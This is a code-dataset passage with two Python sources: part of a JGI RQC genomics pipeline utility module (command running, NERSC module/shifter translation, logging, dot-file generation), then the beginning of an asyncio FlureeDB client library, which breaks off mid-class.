formatter = ColoredFormatter("%(filename)-15s:%(process)d %(asctime)s %(log_color)s%(levelname)s: %(message)s", datefmt=None, reset=True,
log_colors={
'DEBUG': 'blue',
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'red, bg_white',
},
secondary_log_colors={},
style='%')
Not working in conda - 2017-04-29
"""
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(log_level)
return log
'''
Checkpoint the status plus a timestamp
- appends the status
@param status_log: /path/to/status.log (or whatever you name it)
@param status: status to append to status.log
'''
def checkpoint_step(status_log, status):
status_line = "%s,%s\n" % (status, time.strftime("%Y-%m-%d %H:%M:%S"))
with open(status_log, "a") as myfile:
myfile.write(status_line)
'''
returns the last step (status) from the pipeline
@param status_log: /path/to/status.log (or whatever you name it)
@param log: logger object
@return last status in the status log, "start" if nothing there
'''
def get_status(status_log, log = None):
#status_log = "%s/%s" % (output_path, "test_status.log")
status = "start"
timestamp = str(time.strftime("%Y-%m-%d %H:%M:%S"))
if os.path.isfile(status_log):
fh = open(status_log, 'r')
lines = fh.readlines()
fh.close()
for line in lines:
if line.startswith('#'): continue
line_list = line.split(",")
assert len(line_list) == 2
status = str(line_list[0]).strip()
timestamp = str(line_list[1]).strip()
if not status:
status = "start"
if log:
log.info("Last checkpointed step: %s (%s)", status, timestamp)
else:
if log:
log.info("Cannot find status.log (%s), assuming new run", status_log)
status = status.strip().lower()
return status
'''
run a command from python
@param cmd: command to run
@param live: False = run in dry mode (print command), True = run normally
@param log: logger object
@return std_out, std_err, exit_code
'''
def run_command(cmd, live=False, log=None):
stdOut = None
stdErr = None
exitCode = None
#end = 0
#elapsedSec = 0
if cmd:
if not live:
stdOut = "Not live: cmd = '%s'" % (cmd)
exitCode = 0
else:
if log: log.info("cmd: %s" % (cmd))
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdOut, stdErr = p.communicate()
exitCode = p.returncode
if log:
log.info("Return values: exitCode=" + str(exitCode) + ", stdOut=" + str(stdOut) + ", stdErr=" + str(stdErr))
if exitCode != 0:
log.warn("- The exit code has non-zero value.")
else:
if log:
log.error("- No command to run.")
return None, None, -1
return stdOut, stdErr, exitCode
'''
replacement for run_command
- includes logging, convert_cmd & post_mortem
'''
def run_cmd(cmd, log=None):
std_out = None
std_err = None
exit_code = 0
if cmd:
# convert to work on genepool/denovo
cmd = convert_cmd(cmd)
if log:
log.info("- cmd: %s", cmd)
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
std_out, std_err = p.communicate()
exit_code = p.returncode
post_mortem_cmd(cmd, exit_code, std_out, std_err, log)
return std_out, std_err, exit_code
'''
Simple function to output to the log what happened only if exit code > 0
Typical usage:
std_out, std_err, exit_code = run_command(cmd, True)
post_mortem_cmd(cmd, exit_code, std_out, std_err)
'''
def post_mortem_cmd(cmd, exit_code, std_out, std_err, log = None):
if exit_code > 0:
if log:
log.error("- cmd failed: %s", cmd)
log.error("- exit code: %s", exit_code)
else:
print "- cmd failed: %s" % (cmd)
print "- exit code: %s" % (exit_code)
if std_out:
if log:
log.error("- std_out: %s", std_out)
else:
print "- std_out: %s" % (std_out)
if std_err:
if log:
log.error("- std_err: %s", std_err)
else:
print "- std_err: %s" % (std_err)
'''
Convert command to use genepool or denovo (shifter) to run
replace #placeholder; with shifter or module load command
#placeholder.v; should specify the version to use
This should be the only place in the pipelines that specifies the images/modules translation
'''
def convert_cmd(cmd):
new_cmd = cmd
shifter_img = {
"#bbtools" : "shifter --image=bryce911/bbtools ",
"#pigz" : "module load pigz;",
"#jamo" : "shifter --image=registry.services.nersc.gov/htandra/jamo_dev:1.0 ", # works, but would like simple module to use - have one on Denovo but not Cori
"#gnuplot" : "shifter --image=bryce911/bbtools ", # (1)
"#spades/3.9.0" : "shifter --image=bryce911/spades3.9.0 ",
"#spades/3.10.1" : "shifter --image=bryce911/spades3.10.1 ",
"#spades/3.11.0" : "shifter --image=bryce911/spades-3.11.0 ", # GAA-3383
"#spades/3.11.1-check" : "shifter --image=bryce911/spades3.11.1-check ", # development
"#prodigal/2.6.3" : "shifter --image=registry.services.nersc.gov/jgi/prodigal ", # RQCSUPPORT-1318
"#prodigal/2.5.0" : "shifter --image=registry.services.nersc.gov/jgi/prodigal ",
"#prodigal/2.50" : "shifter --image=registry.services.nersc.gov/jgi/prodigal ",
"#lastal/869" : "shifter --image=bryce911/lastal:869 ",
"#lastal/828" : "shifter --image=bryce911/lastal:869 ",
#"#lastal" : "shifter --image=bryce911/lastal:869 ",
"#R/3.3.2" : "module load R/3.3.2;",
"#texlive" : "shifter --image=bryce911/bbtools ", # (1)
"#java" : "shifter --image=bryce911/bbtools ", # (1)
"#blast+/2.6.0" : "shifter --image=sulsj/ncbi-blastplus:2.6.0 ",
"#blast" : "shifter --image=sulsj/ncbi-blastplus:2.7.0 ",
"#megahit-1.1.1" : "shifter --image=foster505/megahit:v1.1.1-2-g02102e1 ",
"#smrtanalysis/2.3.0_p5" : "shifter --image=registry.services.nersc.gov/jgi/smrtanalysis:2.3.0_p5 ", # meth - need more memory
"#mummer/3.23" : "shifter --image=bryce911/mummer3.23 ", # 3.23
"#hmmer" : "shifter --image=registry.services.nersc.gov/jgi/hmmer:latest ", # 3.1b2
"#samtools/1.4" : "shifter --image=rmonti/samtools ",
"#mothur/1.39.5" : "shifter --image=bryce911/mothur1.39.5 ",
"#vsearch/2.4.3" : "shifter --image=bryce911/vsearch2.4.3 ",
"#graphviz" : "shifter --image=bryce911/bbtools ",
"#ssu-align/0.1.1" : "shifter --image=bryce911/ssu-align0.1.1 ", # openmpi/1.10 included in docker container
"#smrtlink/4.0.0.190159" : "shifter --image=registry.services.nersc.gov/jgi/smrtlink:4.0.0.190159 /smrtlink/smrtcmds/bin/", # progs not in path
"#smrtlink/5.0.1.9585" : "shifter --image=registry.services.nersc.gov/jgi/smrtlink:5.0.1.9585 /smrtlink/smrtcmds/bin/", # progs not in path, Tony created 2017-10-16
"#smrtlink" : "shifter --image=registry.services.nersc.gov/jgi/smrtlink:5.0.1.9585 /smrtlink/smrtcmds/bin/", # progs not in path
"#prodege" : "shifter --image=bryce911/prodege ", # 2.2.1
#"#hmmer" : "shifter --image=registry.services.nersc.gov/jgi/hmmer ", # 3.1b2 - Feb 2015, latest as of Oct 2017
"#checkm" : "shifter --image=registry.services.nersc.gov/jgi/checkm ",
}
# (1) - added as part of the bryce911 bbtools package
#cmd = "#bbtools-shijie;bbmap...."
# this dict will be deprecated as of March 2018 when genepool passes into legend
genepool_mod = {
"#bbtools" : "module load bbtools",
"#pigz" : "module load pigz",
"#jamo" : "module load jamo",
"#gnuplot" : "module load gnuplot/4.6.2", # sag,iso,sps,ce:gc_cov, gc_histogram, contig_gc
"#spades/3.9.0" : "module load spades/3.9.0",
"#spades/3.10.1" : "module load spades/3.10.1",
"#spades/3.11.1" : "module load spades/3.11.1-check",
"#prodigal/2.6.3" : "module load prodigal/2.50", # aka 2.50, also 2.60 is available
"#prodigal/2.5.0" : "module load prodigal/2.50",
"#prodigal/2.50" : "module load prodigal/2.50",
#"#lastal" : "module load last/828",
"#lastal/828" : "module load last/828",
"#R/3.3.2" : "module unload R;module load R/3.3.1", # 3.3.2 not on genepool - RQCSUPPORT-1516 unload R for Kecia
"#texlive" : "module load texlive",
"#blast+/2.6.0" : "module load blast+/2.6.0",
#"#blast+/2.7.0" : "module load blast+/2.7.0", # not created
"#blast" : "module load blast+/2.6.0",
"#java" : "", # java runs natively on genepool
"#megahit-1.1.1" : "module load megahit/1.1.1",
"#smrtanalysis/2.3.0_p5" : "module load smrtanalysis/2.3.0_p5",
"#smrtanalysis/2.3.0_p5_xmx32g" : "module load smrtanalysis/2.3.0_p5;export _JAVA_OPTIONS='-Xmx32g'",
"#mummer/3.23" : "module load mummer/3.23",
"#hmmer" : "module load hmmer/3.1b2",
"#samtools/1.4" : "module load samtools/1.4",
"#mothur/1.39.5" : "module load mothur/1.32.1", # 1.26.0 default, 1.32.1
"#vsearch/2.4.3" : "module load vsearch/2.3.0", # 2.3.0
"#graphviz" : "module load graphviz",
"#ssu-align/0.1.1" : "module load ssu-align",
"#smrtlink/4.0.0.190159" : "module load smrtlink/4.0.0.190159",
"#smrtlink" : "module load smrtlink/5.0.1.9585",
"#smrtlink/5.0.1.9585" : "module load smrtlink/5.0.1.9585",
"#prodege" : "module load R;/projectb/sandbox/rqc/prod/pipelines/external_tools/sag_decontam/prodege-2.2/bin/",
"#checkm" : "module load hmmer prodigal pplacer", # checkm installed in python by default on genepool
}
#bbtools;stats.sh
if cmd.startswith("#"):
cluster = "genepool"
# any other env ids to use?
# cori, denovo, genepool
cluster = os.environ.get('NERSC_HOST', 'unknown')
f = cmd.find(";")
mod = "" # command to replace
if f > -1:
mod = cmd[0:f]
if mod:
# use module load jamo on denovo
if mod == "#jamo" and cluster == "denovo":
shifter_img[mod] = "module load jamo;"
if cluster in ("denovo", "cori"):
if mod in shifter_img:
new_cmd = new_cmd.replace(mod + ";", shifter_img[mod])
else:
if mod in genepool_mod:
if genepool_mod[mod] == "":
new_cmd = new_cmd.replace(mod + ";", "")
else:
new_cmd = new_cmd.replace(mod, genepool_mod[mod])
if new_cmd.startswith("#"):
print "Command not found! %s" % new_cmd
sys.exit(18)
#print new_cmd
return new_cmd
'''
returns human readable file size
@param num = file size (e.g. 1000)
@return: readable float e.g. 1.5 KB
'''
def human_size(num):
if not num:
num = 0.0
for x in ['bytes', 'KB', 'MB', 'GB', 'TB', 'PB', 'XB']:
if num < 1024.0:
return "%3.1f %s" % (num, x)
num /= 1024.0
return "%3.1f %s" % (num, 'ZB')
'''
send out email
@param emailTo: email receipient (e.g. <EMAIL>)
@param emailSubject: subject line for the email
@param emailBody: content of the email
@param emailFrom: optional email from
'''
def send_email(email_to, email_subject, email_body, email_from = '<EMAIL>', log = None):
msg = ""
err_flag = 0
if not email_to:
msg = "- send_email: email_to parameter missing!"
if not email_subject:
msg = "- send_email: email_subject parameter missing!"
if not email_body:
msg = "- send_email: email_body parameter missing!"
if err_flag == 0:
msg = "- sending email to: %s" % (email_to)
if log:
log.info(msg)
else:
print msg
if err_flag == 1:
return 0
# assume html
email_msg = MIMEText(email_body, "html") # vs "plain"
email_msg['Subject'] = email_subject
email_msg['From'] = email_from
email_msg['To'] = email_to
p = Popen(["/usr/sbin/sendmail", "-t"], stdin = PIPE)
p.communicate(email_msg.as_string())
return err_flag
'''
Write to rqc_file (e.g. rqc-files.tmp) the file_key and file_value
@param rqc_file_log: full path to file containing key=file
@param file_key: key for the entry
@param file_value: value for the entry
'''
def append_rqc_file(rqc_file_log, file_key, file_value, log=None):
if file_key:
buffer = "%s = %s\n" % (file_key, file_value)
with open(rqc_file_log, "a") as myfile:
myfile.write(buffer)
if log: log.info("append_rqc_file: %s:%s" % (file_key, file_value))
else:
if log: log.warning("key or value error: %s:%s" % (file_key, file_value))
'''
Write to rqc_stats (e.g. rqc-stats.tmp) the stats_key and stats_value
@param rqc_file_log: full path to file containing key=file
@param file_key: key for the entry
@param file_value: value for the entry
'''
def append_rqc_stats(rqc_stats_log, stats_key, stats_value, log=None):
if stats_key:
buffer = "%s = %s\n" % (stats_key, stats_value)
with open(rqc_stats_log, "a") as myfile:
myfile.write(buffer)
if log: log.info("append_rqc_stats: %s:%s" % (stats_key, stats_value))
else:
if log: log.warning("key or value error: %s:%s" % (stats_key, stats_value))
'''
Return the file system path to jgi-rqc-pipeline so we can use */tools and */lib
@return /path/to/jgi-rqc-pipelines
'''
def get_run_path():
current_path = os.path.dirname(os.path.abspath(__file__))
run_path = os.path.abspath(os.path.join(current_path, os.pardir))
return run_path
'''
Simple read count using bbtools n_contigs field
- slightly different than in rqc_utility
n_scaffolds n_contigs scaf_bp contig_bp gap_pct scaf_N50 scaf_L50 ctg_N50 ctg_L50 scaf_N90 scaf_L90 ctg_N90 ctg_L90 scaf_max ctg_max scaf_n_gt50K scaf_pct_gt50K gc_avg gc_std
1346616 1346616 405331416 405331415 0.000 1346616 301 1346615 301 1346616 301 1346615 301 301 301 0 0.000 0.44824 0.02675
'''
def get_read_count_fastq(fastq, log = None):
read_cnt = 0
if os.path.isfile(fastq):
# EnvironmentModules.module(["load", "bbtools"])
# bbtools faster than zcat | wc because bbtools uses pigz
# cmd = "stats.sh format=3 in=%s" % fastq
cmd = "#bbtools;stats.sh format=3 in=%s" % fastq
cmd = convert_cmd(cmd)
if log:
log.info("- cmd: %s", cmd)
std_out, std_err, exit_code = run_command(cmd, True)
# EnvironmentModules.module(["unload", "bbtools"])
if exit_code == 0 and std_out:
line_list = std_out.split("\n")
#print line_list
val_list = str(line_list[1]).split() #.split('\t')
#print "v = %s" % val_list
read_cnt = int(val_list[1])
if log:
log.info("- read count: %s", read_cnt)
else:
if log:
post_mortem_cmd(cmd, exit_code, std_out, std_err, log)
else:
log.error("- fastq: %s does not exist!", fastq)
return read_cnt
'''
Subsampling calculation
0 .. 250k reads = 100%
250k .. 25m = 100% to 1%
25m .. 600m = 1%
600m+ .. oo < 1%
July 2014 - 15 runs > 600m (HiSeq-2500 Rapid) - 4 actual libraries / 85325 seq units
- returns new subsampling rate
'''
def get_subsample_rate(read_count):
subsample = 0
subsample_rate = 0.01
max_subsample = 6000000 # 4 hours of blast time
new_subsample_rate = 250000.0/read_count
subsample_rate = max(new_subsample_rate, subsample_rate)
subsample_rate = min(1, subsample_rate) # if subsample_rate > 1, then set to 1
subsample = int(read_count * subsample_rate)
if subsample > max_subsample:
subsample = max_subsample
subsample_rate = subsample / float(read_count)
return subsample_rate
'''
Set color hash
- need to update to remove "c" parameter - used in too many places
'''
def set_colors(c, use_color = False):
if use_color == False:
color = {
'black' : "",
'red' : "",
'green' : "",
'yellow' : "",
'blue' : "",
'pink' : "",
'cyan' : "",
'white' : "",
'' : ""
}
else:
color = {
'black' : "\033[1;30m",
'red' : "\033[1;31m",
'green' : "\033[1;32m",
'yellow' : "\033[1;33m",
'blue' : "\033[1;34m",
'pink' : "\033[1;35m",
'cyan' : "\033[1;36m",
'white' : "\033[1;37m",
'' : "\033[m"
}
return color
'''
New function that just returns colors
'''
def get_colors():
color = {
'black' : "\033[1;30m",
'red' : "\033[1;31m",
'green' : "\033[1;32m",
'yellow' : "\033[1;33m",
'blue' : "\033[1;34m",
'pink' : "\033[1;35m",
'cyan' : "\033[1;36m",
'white' : "\033[1;37m",
'' : "\033[m"
}
return color
'''
Returns msg_ok, msg_fail, msg_warn colored or not colored
'''
def get_msg_settings(color):
msg_ok = "[ "+color['green']+"OK"+color['']+" ]"
msg_fail = "[ "+color['red']+"FAIL"+color['']+" ]"
msg_warn = "[ "+color['yellow']+"WARN"+color['']+" ]"
return msg_ok, msg_fail, msg_warn
'''
Use RQC's ap_tool to get the status
set mode = "-sa" to show all, even completed
'''
def get_analysis_project_id(seq_proj_id, target_analysis_project_id, target_analysis_task_id, output_path, log = None, mode = ""):
if log:
log.info("get_analysis_project_id: spid = %s, tapid = %s, tatid = %s", seq_proj_id, target_analysis_project_id, target_analysis_task_id)
analysis_project_id = 0
analysis_task_id = 0
project_type = None
task_type = None
ap_list = os.path.join(output_path, "ap-info.txt")
AP_TOOL = "/global/dna/projectdirs/PI/rqc/prod/jgi-rqc-pipeline/tools/ap_tool.py"
#AP_TOOL = "/global/homes/b/brycef/git/jgi-rqc-pipeline/tools/ap_tool.py"
cmd = "%s -spid %s -m psv -tapid %s -tatid %s %s > %s 2>&1" % (AP_TOOL, seq_proj_id, target_analysis_project_id, target_analysis_task_id, mode, ap_list)
if log:
log.info("- cmd: %s", cmd)
else:
print "- cmd: %s" % cmd
std_out, std_err, exit_code = run_command(cmd, True)
post_mortem_cmd(cmd, exit_code, std_out, std_err, log)
if os.path.isfile(ap_list):
ap_dict = {} # header = value
cnt = 0
fh = open(ap_list, "r")
for line in fh:
arr = line.strip().split("|")
if cnt == 0:
c2 = 0 # position of title in header
for a in arr:
ap_dict[a.lower()] = c2
c2 += 1
else:
for a in ap_dict:
if ap_dict[a] + 1 > len(arr):
pass
else:
ap_dict[a] = arr[ap_dict[a]]
cnt += 1
fh.close()
analysis_project_id = ap_dict.get("analysis project id")
analysis_task_id = ap_dict.get("analysis task id")
project_type = ap_dict.get("analysis product name")
task_type = ap_dict.get("analysis task name")
# nno such project
if cnt == 1:
analysis_project_id = 0
analysis_task_id = 0
if log:
log.info("- project type: %s, task type: %s", project_type, task_type)
log.info("- analysis_project_id: %s, analysis_task_id: %s", analysis_project_id, analysis_task_id)
try:
analysis_project_id = int(analysis_project_id)
analysis_task_id = int(analysis_task_id)
except:
analysis_project_id = 0
analysis_task_id = 0
# ap = 4, at = 8 means its using the column names but didn't find anything
if analysis_project_id < 100:
analysis_project_id = 0
if analysis_task_id < 100:
analysis_task_id = 0
return analysis_project_id, analysis_task_id
'''
For creating a dot file from the pipeline flow
'''
def append_flow(flow_file, orig_node, orig_label, next_node, next_label, link_label):
fh = open(flow_file, "a")
fh.write("%s|%s|%s|%s|%s\n" % (orig_node, orig_label, next_node, next_label, link_label))
fh.close()
'''
Flow file format:
# comment
*label|PBMID Pipeline run for BTXXY<br><font point-size="10">Run Date: 2017-09-28 14:22:50</font>
# origin node, origin label, next node, next label, link label
input_h5|BTXXY H5<br><font point-size="10">3 smrtcells</font>|assembly|HGAP Assembly<FONT POINT-SIZE="10"><br>3 contigs, 13,283,382bp</FONT>|HGAP v4.0.1
nodes should be the output of the transformation between the nodes
e.g. input fastq (25m reads) --[ bbtools subsampling ]--> subsampled fastq (10m reads)
creates a dot file, to convert to png use:
$ module load graphviz
$ dot -T png (dot file) > (png file)
More info on formatting the labels
http://www.graphviz.org/content/node-shapes#html
'''
def dot_flow(flow_file, dot_file, log = None):
if not os.path.isfile(flow_file):
if log:
log.info("- cannot find flow file: %s", flow_file)
else:
print "Cannot find flow file: %s" % flow_file
return
fhw = open(dot_file, "w")
fhw.write("// dot file\n")
fhw.write("digraph rqc {\n") # directed graph
fhw.write(" node [shape=box];\n")
fhw.write(" rankdir=LR;\n")
fh = open(flow_file, "r")
for line in fh:
line = line.strip()
if not line:
continue
if line.startswith("#"):
continue
# graph label
if line.startswith("*label"):
arr = line.split("|")
label = flow_replace(str(arr[1]))
fhw.write(" label=<%s>;\n" % label)
fhw.write(" labelloc=top;\n")
else:
arr = line.split("|")
#print arr
if len(arr) == 5:
org_node = arr[0]
org_label = str(arr[1])
next_node = arr[2]
next_label = str(arr[3])
link_label = str(arr[4])
# must be <br/> in the dot file, I have a habit of using <br>
org_label = flow_replace(org_label)
next_label = flow_replace(next_label)
link_label = flow_replace(link_label)
# label are enclosed by < > instead of " " to handle html-ish markups
if next_node:
link = " %s -> %s;\n" % (org_node, next_node)
if link_label:
link = " %s -> %s [label=<%s>];\n" % (org_node, next_node, link_label)
fhw.write(link)
if org_label:
label = " %s [label=<%s>];\n" % (org_node, org_label)
fhw.write(label)
if next_label:
label = " %s [label=<%s>];\n" % (next_node, next_label)
fhw.write(label)
fh.close()
fhw.write("}\n")
fhw.close()
if log:
log.info("- created dot file: %s", dot_file)
return dot_file
'''
simple replacements
'''
def flow_replace(my_str):
new_str = my_str.replace("<br>", "<br/>").replace("<smf>", "<font point-size=\"10\">").replace("</f>", "</font>")
return new_str
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## main program
if __name__ == "__main__":
# unit tests
print human_size(102192203)
print human_size(250000000000)
#print get_read_count_fastq("/global/projectb/scratch/brycef/sag/phix/11185.1.195330.UNKNOWN_matched.fastq.gz")
cmd = "#bbtools;bbduk.sh in=/global/dna/dm_archive/sdm/illumina//01/14/88/11488.1.208132.UNKNOWN.fastq.gz ref=/global/dna/shared/rqc/ref_databases/qaqc/databases/phix174_ill.ref.fa outm=/global/projectb/scratch/brycef/phix/11488/11488.1.208132.UNKNOWN_matched.fastq.gz outu=/global/projectb/scratch/brycef/phix/11488/11488.1.208132.UNKNOWN_unmatched.fastq.gz"
print convert_cmd(cmd)
cmd = "#pigz;pigz /global/projectb/scratch/brycef/align/BTOYH/genome/11463.6.208000.CAAGGTC-AGACCTT.filter-RNA.fastq.gz-genome.sam"
print convert_cmd(cmd)
cmd = "#java;java -version"
print convert_cmd(cmd)
dot_flow("/global/projectb/scratch/brycef/pbmid/BWOAU/f2.flow", "/global/projectb/scratch/brycef/pbmid/BWOAU/BWOUAx.dot")
sys.exit(0)
| 2.515625 | 3 |
aioflureedb/__init__.py | pibara/aioflureedb | 4 | 12765079 | #!/usr/bin/python3
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=simplifiable-if-statement
"""Basic asynchonous client library for FlureeDB"""
import sys
import asyncio
import json
import time
import aiohttp
from aioflureedb.signing import DbSigner
from aioflureedb.domain_api import FlureeDomainAPI
class FlureeException(Exception):
"""Base exception class for aioflureedb"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
Exception.__init__(self, message)
class FlureeHttpError(FlureeException):
"""Non 200 HTTP response"""
def __init__(self, message, status):
"""Constructor
Parameters
----------
message : str
Error message
status : int
HTTP status code
"""
self.status = status
FlureeException.__init__(self, message)
class FlureeHalfCredentials(FlureeException):
"""Incomplete credentials"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
class FlureeKeyRequired(FlureeException):
"""Endpoint invoked that requires signing but no signing key available"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
class FlureeTransactionFailure(FlureeException):
"""Fluree transaction failed"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
class FlureeUnexpectedPredicateNumber(FlureeException):
"""Fluree transaction failed"""
def __init__(self, message):
"""Constructor
Parameters
----------
message : str
Error message
"""
FlureeException.__init__(self, message)
_FLUREEQLQUERY_ENDPOINT_PERMISSIONS = {
'query': {
'permitted': {"select", "selectOne", "selectDistinct", "from", "where", "block", "prefixes", "vars", "opts"},
'depricated': {"filter", "union", "optional", "limit", "offset", "orderBy", "groupBy", "prettyPrint"}
},
'block': {
'permitted': {"block"},
'depricated': {'prettyPrint'}
},
'list_snapshots': {
'permitted': {},
'depricated': {}
},
'snapshot': {
'permitted': {},
'depricated': {}
}
}
class _FlureeQlSubQuery:
"""Helper class for FlureeQL multi-query syntactic sugar"""
def __init__(self, endpoint, method):
"""Constructor
Parameters
----------
endpoint : _FlureeQlEndpoint
API endpoint for communicating FlureeQL queries with FlureeDB
method : str
Name for the sub-query
"""
self.endpoint = endpoint
self.method = method
self.permittedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]['permitted']
self.depricatedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]['depricated']
def __call__(self, **kwargs):
"""FlureeQl query construction through keyword arguments
Parameters
----------
kwargs: dict
Keyword arguments for different parts of a FlureeQL query.
Raises
------
TypeError
If an unknown kwarg value is used.
"""
obj = {}
for key, value in kwargs.items():
if key == "ffrom":
key = "from"
if key == "ffilter":
key = "filter"
if key not in self.permittedkeys:
if key not in self.depricatedkeys:
raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
print("WARNING: Use of depricated FlureeQL syntax,",
key,
"should not be used as top level key in queries",
file=sys.stderr)
obj[key] = value
self.endpoint.multi_query[self.method] = obj
class _FlureeQlQuery:
"""Helper class for FlureeQL query syntactic sugar"""
def __init__(self, endpoint):
"""Constructor
Parameters
----------
endpoint : _FlureeQlEndpoint
API endpoint for communicating FlureeQL queries with FlureeDB
"""
self.endpoint = endpoint
self.permittedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]['permitted']
self.depricatedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]['depricated']
async def __call__(self, **kwargs):
"""FlureeQl query construction through keyword arguments
Parameters
----------
kwargs: dict
Keyword arguments for different parts of a FlureeQL query.
Raises
------
TypeError
If an unknown kwarg value is used.
Returns
-------
dict
json decode result from the server.
"""
obj = {}
for key, value in kwargs.items():
if key == "ffrom":
key = "from"
if key == "ffilter":
key = "filter"
if key not in self.permittedkeys:
if key not in self.depricatedkeys:
raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
print("WARNING: Use of depricated FlureeQL syntax,",
key,
"should not be used as top level key in queries",
file=sys.stderr)
obj[key] = value
return await self.endpoint.actual_query(obj)
async def raw(self, obj):
"""Use a readily constructed FlureeQL dictionary object to invoke the query API endpoint.
Parameters
----------
obj: dict
Complete FlureeQl query object.
Returns
-------
dict
json decode result from the server.
"""
return await self.endpoint.actual_query(obj)
class _UnsignedGetter:
"""Get info with a GET instead of a POST"""
def __init__(self, session, url, ssl_verify_disabled=False, ready=None):
"""Constructor
Parameters
----------
session : aiohttp.ClientSession
HTTP session for doing HTTP post/get with
url : string
URL of the API endpoint.
ssl_verify_disabled: bool
If https, don't verify ssl certs
ready : string
If defined, provide a ready method to wait for ready condition to become true.
"""
self.session = session
self.url = url
self.ssl_verify_disabled = ssl_verify_disabled
self.ready_field = ready
async def __call__(self):
"""Invoke the functor
Returns
-------
dict
JSON decoded response from the server
Raises
------
FlureeHttpError
If the server returns something different than a 200 OK status
"""
if self.ssl_verify_disabled:
async with self.session.get(self.url, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
response = await resp.text()
return json.loads(response)
else:
async with self.session.get(self.url) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
response = await resp.text()
return json.loads(response)
async def ready(self):
"""Redo get untill ready condition gets met"""
if self.ready_field is None:
print("WARNING: no ready for this endpoint", file=sys.stderr)
return
while True:
try:
obj = await self()
if obj[self.ready_field]:
return
except FlureeHttpError:
pass
except aiohttp.client_exceptions.ClientConnectorError:
pass
await asyncio.sleep(0.5)
class _SignedPoster:
"""Basic signed HTTP posting"""
def __init__(self, client, session, signer, url, required, optional, ssl_verify_disabled, unsigned=False):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient used for checking for new databases
session : aiohttp.ClientSession
HTTP session for doing HTTP post/get with
signer : aioflureedb.signing.DbSigner
ECDSA signer for Fluree transactions and queries
url : string
URL of the API endpoint
required : set
Set of required fields for the specific API call.
optional : set
Set of optional fields for the specific API call.
ssl_verify_disabled: bool
If https, ignore ssl certificate issues.
unsigned : bool
If True, don't sign posts.
"""
self.client = client
self.session = session
self.signer = signer
self.url = url
self.required = required
self.optional = optional
self.unsigned = unsigned
if self.signer is None:
self.unsigned = True
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server, dict if decodable json
Raises
------
FlureeHttpError
When Fluree server returns a status code other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
async def __call__(self, **kwargs):
"""Invoke post API
Parameters
----------
kwargs : dict
Keyword arguments for the POST API call.
Returns
-------
dict
JSON decoded response from FlureeDB server
Raises
------
TypeError
If an unknown kwarg is used on invocation OR a required kwarg is not supplied
"""
# pylint: disable=too-many-locals
kwset = set()
kwdict = {}
for key, value in kwargs.items():
if not (key in self.required or key in self.optional):
raise TypeError("SignedPoster got unexpected keyword argument '" + key + "'")
kwset.add(key)
if key == "db_id":
kwdict["db/id"] = value
else:
kwdict[key] = value
for reqkey in self.required:
if reqkey not in kwset:
raise TypeError("SignedPoster is missing one required named argument '", reqkey, "'")
body = json.dumps(kwdict, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
if not self.unsigned:
body, headers, _ = self.signer.sign_query(kwdict)
rval = await self._post_body_with_headers(body, headers)
# If this is a new-db, we need to await till it comes into existance.
if isinstance(rval, str) and len(rval) == 64 and self.url.split("/")[-1] == "new-db" and "db_id" in kwargs:
dbid = kwargs["db_id"]
while True:
databases = await self.client.dbs()
for database in databases:
dbid2 = database[0] + "/" + database[1]
if dbid == dbid2:
return True
await asyncio.sleep(0.1)
return rval
class _Network:
"""Helper class for square bracket interface to Fluree Client"""
def __init__(self, flureeclient, netname, options):
"""Constructor
Parameters
----------
flureeclient : FlureeClient
FlureeClient object to use as reference.
netname : string
Name of the network for net/db fluree database naming.
options : set
Set with existing databases within network.
"""
self.client = flureeclient
self.netname = netname
self.options = options
def __str__(self):
"""Cast to string
Returns
-------
str
Name of the network
"""
return self.netname
def __getitem__(self, key):
"""Square brackets operator
Parameters
----------
key : string
Name of the desired database
Returns
-------
_DbFunctor
Function for constructing a Fluree Database client.
Raises
------
KeyError
When a non defined database is requested.
"""
database = self.netname + "/" + key
if key not in self.options:
raise KeyError("No such database: '" + database + "'")
return _DbFunctor(self.client, database)
def __iter__(self):
"""Iterate over databases in network
Yields
------
string
Name of the database
_DbFunctor
Function object for getting a FlureeDB database object for this particular DB.
"""
for key in self.options:
database = self.netname + "/" + key
yield _DbFunctor(self.client, database)
class _DbFunctor:
"""Helper functor class for square bracket interface to Fluree Client"""
def __init__(self, client, database):
"""Constructor
